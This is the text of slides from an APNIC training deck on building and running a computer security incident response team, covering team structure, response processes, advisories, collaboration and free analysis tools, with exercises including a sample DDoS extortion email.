  • 41. Objective of Incident Response •  To mitigate or reduce risks associated to an incident •  To respond to all incidents and suspected incidents based on pre-determined process •  Provide unbiased investigations on all incidents •  Establish a 24x7 hotline/contact – to enable effective reporting of incidents. •  Control and contain an incident –  Affected systems return to normal operation –  Recommend solutions – short term and long term solutions 42
  • 42. Dealing with Incidents – Bottom Line •  What happens if you don’t deal with incidents? –  Become Tomorrow’s Headline (Image) –  I or Domain Blacklisted (Availability & Financial Loss) •  Linked to Criminals •  The World needs you! –  Trusted point of contact (information on infected or compromised hosts –  Doing your bit to keep the Internet a safe and secure place for everyone! 43
  • 43. The CSIRT Organisation •  Defining the CSIRT Organisation •  Mission Statement –  High level definition of what the team will do •  Constituency –  Whose incidents are we going to be handling or responsible for –  And to what extent •  CSIRT position / location in the Organisation •  Relation to other teams (or organisations) 44
  • 44. Possible Activities of CSIRTs • Incident Handling • Alerts & Warnings • Vulnerability Handling • Artefact Handling • Announcements • Technology Watch • Audits/Assessments • Configure and Maintain Tools/ Applications/Infrastructure • Security Tool Development • Intrusion Detection • Information Dissemination • Risk Analysis • Business Continuity Planning • Security Consulting • Awareness Building • Education/Training • Product Evaluation List from CERT-CC (www.cert.org/csirts/) 45
  • 45. Operations & Availability •  Incidents don’t happen on a particular day or time •  How to ensure 24 x7 reachability? –  IRT Object In WHOIS Database –  Email (Mailing List) –  Phone, SMSes –  Information on the Website –  Relationship with National CSIRTs and Others Relevant Organisations •  ISPS, Vendors, Law Enforcement Agencies 46
  • 46. Different kinds of CSIRTs •  The type of activities, focus and capabilities may be different •  Some examples –  National CSIRTs –  Vendor CSIRTs –  (Network & Content) Providers Teams 47
  • 47. Resources Consideration (1) •  People, Process and Technology Requirements •  People –  Resources for: •  Handling Incidents Reports (Dedicated?) •  Technical Analysis & Investigation –  What kinds of skills are required ? •  Familiarity with technology •  Familiarity with different types of security incidents •  Non Technical skills – Communication, Writing •  Trustworthiness 48
  • 48. Resources Requirements (2) •  Process & Procedures –  Generally from the beginning of incident till when we resolve the incident –  Including lessons learned & improvement of current policies or procedures –  Must be clear so that people know what do to –  Importance •  Specific Procedures for Handling Specific types of Incidents –  Malware Related –  DDoS –  Web Defacement –  Fraud –  Data Breach 49
  • 49. Source: Special Publication 800-61* Computer Security Incident Handling Guide page 3-1 * http://csrc.nist.gov/publications/nistpubs/800-61-rev1/SP800-61rev1.pdf Incident Response/ & Handling 50
  • 50. Applying the Framework - Responding to a DDOS Incident 1.  Preparation 2.  Identification 3.  Containment 4.  Remediation 5.  Recovery 6.  Aftermath/Lessons Learned 51 Reference: cert.societegenerale.com/resources/files/IRM-4-DDoS.pdf
  • 51. Example Team Structure •  First Level –  Helpdesk, Perform Triage •  2nd Level –  Specialists •  Network Forensics •  Malware Specialists •  Web Security Specialists •  Overall Co-ordination 52
  • 52. Understanding Role of Others in the Organisation •  Different roles in the organisations –  CEO: to maximise shareholder value –  PR officer: to present a good image to the press –  Corporate Risk: to care about liabilities, good accounting, etc. –  CSIRT: to prevent and resolve incidents •  Don’t assume these interests automatically coincide - but with your help, they can ! 53
  • 53. Technical Non- Technical Incident Response/Handling – Skills / Activities Overview 54 Logistics Coordination Communication Planning Log Analysis Forensics Network Reversing
  • 54. Resources Requirements •  Technology / Tools •  Essentially 2 parts –  For handling Incidents & Incidents Related Artifacts •  Managing tickets, secure communications, etc •  RTIR, OTRS, AIRT are some good examples –  Tools & Resources for Analysis & Investigation •  Depending on the type of work that is required •  For performing: –  Hosts Analysis, Log Analysis, Traffic Analysis, Network Monitoring, Forensics, Malware Analysis –  Tools that support standards for exchanging Threat Intels with other teams (STIX & TAXII) 55
  • 56. Phish Response Checklist 1.  Analyse / Report of Spam 2.  Phishing Site Take Down –  Removal / Suspension –  Browser Notification 3.  Phishing Site Analysis –  Phishkits ? 4.  Credentials ‘Stolen’ –  Notify Users 5.  Report / Escalation 6.  Lessons Learned 57
  • 57. Advisories and Alerts •  Scenarios that potentially require Advisory or Alert –  Incident that could potential have a wide-scale impact –  Examples •  Declaration by attacker to launch attack •  Critical vulnerability of ‘popular’ software in the constituency •  Some types of Incidents Require action by those in your consituencies –  They have to apply the patch themselves –  Their network or systems are not reachable to you –  They must perform additional risk assessment –  Perform check so that to ensure that they are not vulnerable 58
  • 58. Advisories and Alerts (2) •  Content –  Should be clear & concise •  What is impacted •  If fix available or workaround –  Shouldn’t be confusing –  Guide on how to determine or apply fix could be useful •  Distribution of advisory and alerts –  Preparation of targeted list based on industry, common systems, groups –  Using suitable platforms to reach out (including media) –  Goal is to reach out as quick as possible the right •  Special Programs with Vendors –  Early alert – i.e. Microsoft 59
  • 59. Working with Law Enforcement Agencies & Judiciary Sector •  Some incidents have elements of crime –  ‘Cyber’ or non-cyber laws –  Regulatory framework •  Implication –  Must work with Law Enforcement Agency (must notify) –  Preservation of digital evidence (logs, images, etc) •  Proper configuration of systems, time etc –  Working together with LEAs to investigate •  Monitoring, recording and tracking •  Responding to requests •  Training and Cyber Security Exercises can help to create awareness 60
  • 60. Collaboration & Information Sharing •  Bad guys work together, Good guys should too! •  Make yourself known, establish trust, collaborate and learn from others •  Association of CSIRTS –  National CSIRTs groups (in some countries) –  Regional – APCERT, OIC-CERT, TF-CSIRT –  Global – FIRST.org •  Closed & Trusted Security Groups –  NSP-SEC –  OPS-TRUST •  Getting Feeds about your constituencies (and sharing with them) –  ShadowServer Foundation –  Team Cymru –  Honeynet Project 61
  • 61. Getting Involved •  Global Take Downs / Co-ordinated Response –  DNSChanger Working Group –  Conficker Working Group •  Cyber Security Exercises –  Multiple Teams & Multiple Scenarios activities –  Getting to know your peers and improving internal processes as capabilities –  Example: APCERT Drill, ASEAN Drill, etc •  Helping Promote Best Practices & Awareness –  Source Address Validation (BCP 38) –  APWG Stop – Think – Connect (APWG.org) 62
  • 62. Collaboration & Co-operation •  Check out some of the security organisations mentioned earlier –  APCERT – http://www.apcert.org –  FIRST – http://www.first.org –  ShadowServer Foundation http://www.shadowserver.org –  Team Cymru - https://www.team-cymru.org/Services/ –  Honeynet Project – http://www.honeynet.org 63
  • 63. Managing CSIRT •  Having sufficient resources is critical to maintain cert / csirt operation •  Consider having funds for traveling to participate in workshops, training and meetings 64
  • 64. 3.0 Free / Open Source Tools 65
  • 65. About this Module •  This module covers some publicly available tools that can be used for managing incident reports and performing (initial) analysis •  Depending on the nature of the incident, different sets of tools will have to be used by the incident responder •  It is by no means comprehensive but useful to gain initial insights when handling an incident 66
  • 66. Managing Incident Reports •  There may be multiple ways to contact a CERT / CSIRT –  Email, Web Form, Fax, Security Systems –  Should ensure that reports (tickets) are attended to •  Workflow System for managing abuse reports and artifacts –  Web-based system –  Reflect policies for incident response / handling activities –  Artifacts: Logs, executables –  Generate reports for review and lessons learned •  Some Solutions: –  RTIR: RT for Incident Response http://bestpractical.com/rtir/ –  OTRS: https://www.otrs.com/software/open-source/ 67
  • 67. Malicious software, files, URLs analysis service 1.  Malwr Sandbox –  http://www.malwr.com –  Based on Cuckoo Sandbox (Open Source) 2.  Anubis –  http://anubis.iseclab.org/ 3.  VirusTotal –  http://www.virustotal.com 4.  Wepawet –  http://wepawet.iseclab.org/ 68
  • 68. Spam and Web Defacement •  Spam Header Analysis –  http://mxtoolbox.com/Public/Tools/EmailHeaders.aspx •  Zone-H Defacement Archive –  http://www.zone-h.com 69
  • 69. Whois Database & Passive DNS •  The whois database is an indispensable tool for incident handling. •  RIR’s whois database gives information about a network i.e. who is the point contact •  But we need historical data on who use to own it –  May show something suspicious •  Passive DNS: –  http://www.bfk.de/bfk_dnslogger.html 70
  • 70. Abuse Information about your Network •  There are multiple initiatives on the Internet that could be of use to gain information about abuses or potential abuses on your network 1.  Abuse.ch – Zeus, SpyEye, Palevo, Feodo malware Tracker i.e. http://zeustracker.abuse.ch 2.  Malware Domain List –  http://www.malwaredomainlist.com/ –  http://www.malwaredomains.com/ 3.  Open DNS Resolvers –  http://openresolverproject.org/ 71
  • 71. Secure Communication Tools •  Best Practice to have use GnuPG/PGP for communication –  For signing and/or encrypting messages –  Extremely useful for information sharing (especially on need to know basis) •  Keys that belong to others (teams or individuals) are published on public PGP key servers –  http://pgp.mit.edu •  ‘Key-signing’ parties are common at CSIRT meetings or gathering 72
  • 73. Exercise – 1 •  Defining your CERT/CSIRT based on RFC2350 –  RFC2350 - Expectations for Computer Security Incident Response –  https://www.rfc-editor.org/rfc/rfc2350.txt 74
  • 74. Exercise 2 – From .RU (or somewhere) with Love 75 Date: Day, Month 2011 Subject: Partnership From: Attacker To: Victim Your site does not work because We attack your site. When your company will pay to us we will stop attack. Contact the director. Do not lose clients.
  • 75. Exercise 3 – Writing a Security Advisory •  Information about critical vulnerability affecting a popular application. •  Write a security advisory to your constituent explaining the situation and action required of them 76
  • 76. Recap •  We have covered –  The bigger picture – Managing Risks and Cyber Security –  The need to respond to incidents –  Setting up Security Response Teams •  Defining the Team & Team Structure •  Resources required •  Policies, SOPs, SLAs •  Tools for incident handlers •  Making yourself known and working with others •  Keep Calm & Incident Response! 77
  • 77. Questions ? Keep in touch! Adli Wahid adli@apnic.net Check out: http://training.apnic.net 78
  • 78. APNIC Survey 2014 •  11 -22 June 2014 •  Opportunity to provide input on APNIC’s performance, development, and future direction •  Contributes to APNIC’s future planning processes •  Run by an impartial, independent research organization •  Confidentiality of respondents guaranteed 79 survey.apnic.net
  • 79. You’re Invited! •  APRICOT 2015: Fukuoka, Japan, 24 Feb-6 Mar 2015 80